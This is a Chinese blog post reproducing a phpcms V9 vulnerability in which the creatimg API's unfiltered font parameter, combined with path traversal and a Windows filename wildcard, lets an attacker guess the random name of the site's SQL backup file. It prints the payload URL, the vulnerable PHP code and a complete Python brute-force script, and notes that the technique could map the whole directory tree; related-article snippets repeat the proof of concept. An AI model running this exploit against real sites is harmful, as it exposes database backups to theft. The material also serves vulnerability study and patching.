phpcms数据库备份与恢复_phpcms V9 sql备份文件名爆破

最新推荐文章于 2022-07-11 14:58:28 发布
最新推荐文章于 2022-07-11 14:58:28 发布
阅读量603 收藏 1
点赞数
文章标签: phpcms数据库备份与恢复
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39729837/article/details/111926993
版权
本文详细介绍了phpcms V9中利用/api/creatimg.php接口进行数据库备份文件名爆破的过程。通过构造特定payload,攻击者可以探测到数据库备份文件路径,从而获取敏感信息。漏洞主要源于文件存在性检查时,用户输入未得到充分过滤,允许特殊字符。文章附带了爆破脚本示例,并指出该漏洞可能导致整个phpcms目录结构的泄露。
摘要由CSDN通过智能技术生成

payload:/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/gv5dmx<<.sql>

我们知道windows的FindFirstFile(API)有个特性就是可以把<

这个漏洞和前一阵子dedecms后台爆破如出一辙,api.php文件的$op变量决定用户的操作

# api.php

define('PHPCMS_PATH', dirname(__FILE__).DIRECTORY_SEPARATOR);

include PHPCMS_PATH.'phpcms/base.php';

......

$op = isset($_GET['op']) && trim($_GET['op']) ? trim($_GET['op']) : exit('Operation can not be empty');

......

if (!preg_match('/([^a-z_]+)/i',$op) && file_exists(PHPCMS_PATH.'api/'.$op.'.php')) {

include PHPCMS_PATH.'api/'.$op.'.php';

......

?>

在/api/creatimg.php文件中,使用了file_exists()函数判断$fontfile文件是否存在,文件存在和不存在的返回信息是不同的,而且$fontfile可以被用户控制,且未过滤.和/等符号,最终导致了漏洞发生。

# /api/creatimg.php

defined('IN_PHPCMS') or exit('No permission resources.');

$txt = trim($_GET['txt']);

if(extension_loaded('gd') && $txt ) {

......

$fontfile = isset($_GET['font']) && !empty($_GET['font']) ? $fontpath.trim($_GET['font']) : $fontpath.'georgia.ttf';

......

if(file_exists($fontfile)){

//计算文本写入后的宽度,右下角 X 位置-左下角 X 位置

$image_info = imagettfbbox($fontsize,0,$fontfile,$txt);

$imageX = $image_info[2]-$image_info[0]+10;

$imageY = $image_info[1]-$image_info[7]+5;

......

爆破脚本如下:

#!/usr/bin/env python

# coding=utf-8

'''/*

* author = Mochazz

* team   = 红日安全团队

* env    = pyton3

*

*/

'''

import requests

import itertools

characters = "abcdefghjklmnopqrstuvwxyz0123456789_!#"

backup_sql = ""

payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<

url = "http://192.168.0.106"

flag = 0

for num in range(1,7):

if flag:

break

for pre in itertools.permutations(characters,num):

pre = ''.join(list(pre))

payload = payload.format(location=pre)

r = requests.get(url+payload)

if r.status_code == 200 and "PNG" in r.text:

flag = 1

backup_sql = pre

payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<

break

else:

payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<

print("[+] 前缀为:",backup_sql)

flag = 0

for i in range(30):

if flag:

break

for ch in characters:

if ch == characters[-1]:

flag = 1

break

payload = payload.format(location=backup_sql+ch)

r = requests.get(url + payload)

if r.status_code == 200 and "PNG" in r.text:

backup_sql += ch

print("[+] ",backup_sql)

payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<

break

else:

payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<

print("备份sql文件地址为:",backup_sql+".sql")

效果如下:

后记:

在测试的过程中,由于本地php环境出现问题,导致复现一直没成功,最终重装环境解决问题。实际上,如果这个程序加以修改,理论上是可以利用这个漏洞遍历整个phpcms目录文件结构的,只要前缀重复的不多(例如get_file.php和get_img.php的重复前缀为get_)。

相关文章:

weixin_39729837
关注
phpmyadmin备份mysql_使用phpMyAdmin从备份恢复MySQL数据库教程(图文)
weixin_39535287的博客
01-19 190
phpMyAdmin是一个数据库程序,用于通过web接口远程操作数据库。在基本级别,它允许完全管理数据库表(创建、编辑、删除)和其中包含的数据(选择、更新、删除行)。phpMyAdmin还允许创建和恢复数据库备份,在本教程中,我们只讨论数据库恢复过程。dBq云狐网 - 电脑_数码_手机应用的IT技术网站Seo步骤1 – 进入phpMyAdminphpMyAdmin通常位于控制面板的数据库部分。dB...
4-PHP代码审计——PHPCMSV9.6.1暴力猜解备份数据库文件
网络安全
04-01 584
实验环境的poc /api.php?op=creatimg&txt=1&font=/../../../../caches/bakup/default/z<<.sql 登录phpcms的管理员后台,在扩展模块找到数据库工具,选中数据库文件开始备份数据库 点击备份数据库后,会在C:\wamp\www\test.com\caches\bakup\default目录下生成sql备份文件: 直接在浏览器中访问路径可以下载sql文件: 现在我...
PHPCMSv9逻辑漏洞导致备份文件名可猜测
weixin_30633405的博客
07-25 345
POC: #!/usr/bin/env python #coding=utf-8 import urllib2 def check(url): mark = True req = urllib2.Request(url) req.add_header('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; W...
php逻辑漏洞,PHPCMSv9逻辑漏洞导致备份文件名可猜测
weixin_42299169的博客
03-11 331
简要描述一处逻辑漏洞导致备份文件名可猜测,影响phpcmsv9所有版本。一、漏洞原理我们知道windows的FindFirstFile(API)有个特性就是可以把<二、漏洞形成程序文件apicreatimg.php里的$fontfile变量可控随后便进入file_exists函数判断。当文件存在和不存在时所返回的页面是不一样的。所以完全可以利用这个点来把长达30多位随机字母名称的备份文件推算...
Dedecms备份文件泄露
maverickpig的博客
07-19 511
网络安全自学日志-漏洞复现篇:Dedecms备份文件泄露 好久没更新了,最近工作中遇到的漏洞都没有记录下来,今天完成一下。如有侵权,请联系我删除 漏洞原理 windows下的文件短名是dos+fat12/fat16时代的产物,又称为8dot3命名法,类似于PROGRA1(目录)或者元素周1.exe(文件)这样的名称。 8是指文件名或目录名的主体部分小于等于8个字符 ; 3是指文件名或目录名的扩展部分小于等于3个字符 ;中间以 . 作为分割 在FAT16文件系统中,由于FDT中的文件目录登记项只为文件名保留
phpcms数据库备份恢复_PHPCMS V9 数据库备份恢复
weixin_28730131的博客
12-23 463
PHPCMS V9 数据库备份恢复一、数据库备份1. 登录网站管理后台,记录PHPCMS V9的版本为了防止因版本升级后数据库无法进行恢复,所以管理员应该养成在备份数据时要记录相应的平台版本。同时还要提醒记录下这时候的管理员的帐号和密码。2. 进入数据库工具界面在上图所示管理后台的首页,单击“扩展”,这时会进入扩展界面,左边有一个“数据库工具”,这是进行数据库备份恢复的地方。3. 备份数据库在...
PHPCMS V9用户手册.zip_9T4_phpcms_phpcms v9 手册_phpcms v9手册
09-21
PHPCMS V9(简称V9)采用PHP5+MYSQL做为技术基础进行开发。V9采用OOP(面向对象)方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展,代码维护,优秀的二次开发能力,可满足所有网站的...
phpcms_v9_beta_GBK.zip_PHPCMS_V9_beta
09-23
PHPCMS V9(简称V9)采用PHP5+MYSQL做为技术基础进行开发。V9采用OOP(面向对象)方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展,代码维护,优秀的二次开发能力,可满足所有网站的...
phpcms_v9_beta_GBK.zip_beta_phpcms
09-14
phpcms_v9.beta_GBK.zip - 快速建站与PHP源码解析》 phpcms_v9_beta_GBK.zip 是一个专为网站搭建而设计的压缩包,它包含了PHP源码,是站长们快速建立网站的理想工具。"beta"标签表明这是一个测试版本,意味着在...
phpcms_v9 后台上传图片按钮无法点击
06-21
1. **备份源代码**:在进行任何修改之前,确保先备份原始的PHP CMS v9源代码,以防万一出现问题可以回滚到初始状态。 2. **定位上传代码**:找到PHP CMS v9中处理图片上传的代码,通常在相关控制器或服务类中。查找...
phpcms-v9.zip_phpcms
09-19
这款"phpcms-v9.zip_phpcms"压缩包包含了用于构建企业网站的模板源码,旨在提供一个简单清新、易于使用的网站界面,帮助企业快速搭建自己的在线平台。 1. **PHP CMS V9系统概述** PHP CMS V9是一个高效、易用、...
phpcms数据库备份恢复_PHPCMS系统迁移的简单方法 (强调数据库的备份和还原...
weixin_32120857的博客
12-23 248
PHPCMS系统迁移的简单方法 (强调数据库的备份和还原(2009-12-1322:07:07)在自己的电脑上利用功能强大的PHPCMS制作完网站,我们当然要放到虚拟主机空间上去。首先,我们要把在自己电脑中做好的网站的数据库备份一下,备份的方法可以进入phpmyadmin也可以用PHPCMS后台本身自带的备份工具进行备份。我推荐大家使用系统后台自己带的备份功能进行备份,因为很简单也很方便,不用太多...
phpcms的漏洞复现
https://www.cnblogs.com/zpchcbd/
09-26 3716
xxxxxxxxxxx
125.网络安全渗透测试—[CMS后台 getwebshell]—[南方数据 nfsj v18后台 getwebshell]
qwsn
07-11 5895
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 进入后台---->系统管理---->网站信息设置---->上传网站log---->选择asp图片马(密码为123)使用Burp抓包---->送入Reapeater模块---->SaveToPath的值修改为: (截断记得url解码)---->发送该包并且放开拦截---->asp马位置:传送门......
phpcms漏洞姿势
2ed
05-09 706
作者:J0o1ey 原文来自:论如何优雅地拿下PHPCMS 一、PHPCMS简介 PHP是国内领先的网站内容管理系统,同时也是一个开源的PHP开发框架,采用PHP5+MYSQL进行开发,拥有非常庞大的用户量。 百度百科介绍其优点主要如下: ①功能强大 ②模块化,开源,可扩展功能强大灵活 ③支持自定义模型和字段负载能力强,支持千万级数据模板制作方便 ④支持中文标签和万能标签进行数...
phpcms 漏洞姿势
热门推荐
2ed
06-26 2万+
一 .PHPCMS V9本地文件包含漏洞 漏洞出现在如下文件:phpcms/modules/search/index.php 代码如下: 本处大家会发现在使用file_get_contents函数时没有过滤get方式得到的m参数 因此可以构造payload如下 www.xxx.com/m=search&a=public_get_suggest_keyword&q=../../ph...
src="/api.php?op=qr,phpcms常用接口调用方法
weixin_29171129的博客
04-09 478
1、phpcms可视化编辑器的调用方法需要用到editor函数,editor($textareaid = 'content', $toolbar = 'phpcms', $width = 500, $height = 400)$textareaid 为文本框 id$toolbar 为工具按钮样式,目前有 phpcms 和 introduce 两种可以选择,一般较大的内容编辑框用 phpcms,而简...
基于ssm的理发店会员管理系统设计与实现.docx
最新发布
09-14
基于ssm的理发店会员管理系统设计与实现.docx
PHPCMS_V9开发指南:MVC架构与文件结构详解
本文档是关于PHPCMS_V9的开发指南,适合那些使用此版本进行网站开发的项目团队。PHPCMS_V9基于PHP编程语言构建,主要关注于服务器配置、模型-视图-控制器(Model-View-Controller,MVC)架构以及文件目录结构。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值